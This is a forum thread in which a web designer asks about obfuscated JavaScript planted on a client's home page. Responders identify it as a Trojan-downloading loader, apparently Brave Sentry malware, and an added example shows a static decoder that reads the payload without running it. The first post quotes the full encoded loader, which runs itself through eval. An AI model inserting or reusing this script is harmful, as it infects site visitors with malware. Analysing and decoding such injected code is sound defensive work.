Mystery Source Code

Edward

Can anyone tell me what this is....

<body style="background-image: url(bgrnd_home.jpg); background-attachment:
fixed;"><script language=JavaScript>function fban(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,7,57,18,32,24,1,55,27,0,0,0,0,0,0,44,4,14,0,53,8,61,42,48,13,29,33,6,11,56,36,19,39,58,60,43,22,25,59,9,31,34,0,0,0,0,37,0,45,40,41,5,35,46,38,47,12,54,26,15,21,20,51,52,23,30,17,28,3,62,50,10,16,2);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(193^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}fban('jZRT_RGahM9a5UMawwh3dRRTOkfv_RGbpwxchUWWjBMGD4kRg8lGQBMb@4kNhzxTOw0cNPGFj2f@oxx0eQkaDLWvfWfc5UMcDukcwvvTOUTWDRf0gTBe5U9GhlTTpvkccoEbDgRWozRT_RxTcevRHPlv3qlRG9vcNPGFj9fRglrNjZkcDgx0wMhSKQxcbkkGDwYF32f@DZ9TOw0N_ZG@1jxbNf0Tfvxce0Y0feRcozxTOvh3bu')</script>

.....The background is a genuine image but that is all I recognise.

This is off the website's Home page which has been uploaded by the website's
owner since I originally published it. She has been having a few problems
which I have managed to resolve but this bit is a mystery to me.

Can anyone help?

TIA

Ed
 
It is JavaScript that calls up a website that downloads a Trojan onto
the computer. The script is malicious and must be removed. Your
client's PC and web site should also be disinfected.
 
Thanks, Ron.

I'll take care of it immediately.

Best wishes,

Ed


 
Ron-
Can you break that down some time, so that others may see what is happening
in this script? It is beyond what I know of JavaScript.


 
Looks like Brave Sentry malware...google it...but I would NOT go to their
website.



--
~~~~~~~~~~~~~~~~~~
Rob Giordano
Microsoft MVP Expression






 
I'll look over the weekend. Rob's post may be more useful.

--
Ron Symonds - Microsoft MVP (FrontPage)
Reply only to group - emails will be deleted unread.

http://www.rxs-enterprises.org/fp




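An added example, not part of any post in this thread: a static decoder for the fban() routine in the original post that returns the decoded text instead of passing it to eval(), so it can be read without being run. The names decodeStatic and defang are assumptions made for this example; the lookup table and the XOR constant 193 are copied from the posted script.

```javascript
// Added analysis example, not code from the thread.
// decodeStatic() and defang() are hypothetical helper names.

// Lookup table copied from the posted script. Index = charCode - 48, so it
// spans '0'..'z': a shuffled 64-symbol alphabet (0-9, @, A-Z, _, a-z).
const TABLE = [
  63,49,7,57,18,32,24,1,55,27,0,0,0,0,0,0,44,4,14,0,53,8,61,42,48,13,29,33,
  6,11,56,36,19,39,58,60,43,22,25,59,9,31,34,0,0,0,0,37,0,45,40,41,5,35,46,
  38,47,12,54,26,15,21,20,51,52,23,30,17,28,3,62,50,10,16,2,
];
const XOR_KEY = 193; // constant from the posted script

// Same unpacking as fban(): four 6-bit symbols become three bytes, each byte
// XORed with 193. The original eval()s every 1024-character block; here the
// text is only returned so it can be read, logged or diffed.
function decodeStatic(encoded) {
  let out = '';
  let acc = 0;   // bit accumulator ("w" in the original)
  let shift = 0; // bits already held in acc ("s" in the original)
  for (let i = 0; i < encoded.length; i++) {
    const idx = encoded.charCodeAt(i) - 48;
    if (idx < 0 || idx >= TABLE.length) {
      // Forum line wrapping can inject spaces or newlines; fail loudly.
      throw new RangeError('character outside alphabet at offset ' + i);
    }
    acc |= TABLE[idx] << shift;
    if (shift) {
      out += String.fromCharCode(XOR_KEY ^ (acc & 255));
      acc >>= 8;
      shift -= 2;
    } else {
      shift = 6;
    }
  }
  return out;
}

// Neutralise URL schemes so the decoded text is safe to paste into a report.
function defang(text) {
  return text.replace(/http(s?):\/\//gi, 'hxxp$1://');
}

// First eight characters of the string passed to fban() in the original post.
console.log(defang(decodeStatic('jZRT_RGa'))); // prints "window"
```

To read the whole payload, pass the full string from the post as one unbroken line; any whitespace introduced by line wrapping raises the RangeError rather than silently corrupting the output.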
 